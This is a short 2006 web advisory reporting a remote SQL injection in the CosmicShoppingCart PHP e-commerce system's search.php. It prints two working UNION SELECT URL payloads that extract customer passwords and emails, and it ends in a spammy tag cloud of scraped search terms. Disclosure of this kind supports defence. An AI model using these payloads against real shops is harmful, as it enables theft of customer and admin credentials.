about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , CosmicShoppingCart (search.php) Remote SQL Injection Vulnerability



2006-05-28 CosmicShoppingCart (search.php) Remote SQL Injection Vulnerability
Rated as : Moderate Risk

Software: CosmicShoppingCart (www.cosmicphp.com)
Risk: Medium
Discovered by: Vympel (Marcelo Almeida)
Background: CosmicShoppingCart is a PHP / MySQL e-commerce system. It is a
fully customizable, shopping cart designed.

SQL injections have been found, they could be exploited by users to
retrieve the passwords of the admin.

Examples:
cosmicshop/search.php?max=-1%20UNION%20SELECT%201,1,1,cust_password,1,1,1,1,1%20FROM%20custs/*
cosmicshop/search.php?max='2'%20UNION%20SELECT%20'a','a','a',cust_email,cust_password,'abc',1,'a','a'%20FROM%20custs--
securitydot.net - 2006-05-28

Advertising

Copyright 2007, SecurityDot
Wed, 25 Nov 2009 18:41:32 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
AllMyGuest Memek anak 200 /compo www.168vip www.necnec allmyguest allmyguest news for c NetSupport t43t desi coupl mambo Remo news for c Crack+Data Thirsha se 200 /compo phpplatinu www.www.zh outlook news for c WWW.FUCKI. news for c Crack+Data joomla 1.0 Pornosex+v www.www.zh Xxx 89.com cpanel pro sexcy vide Free...lew news for c www.master 200 /compo freebsd re www.pink w freebsd re Free downl Www.pk sex (/AUX/.asp news for c vida guerr arakbic ge news for c news for c v...ww.cab zeroboard Vidio bf b W...99(nob Jabafun.Co carrd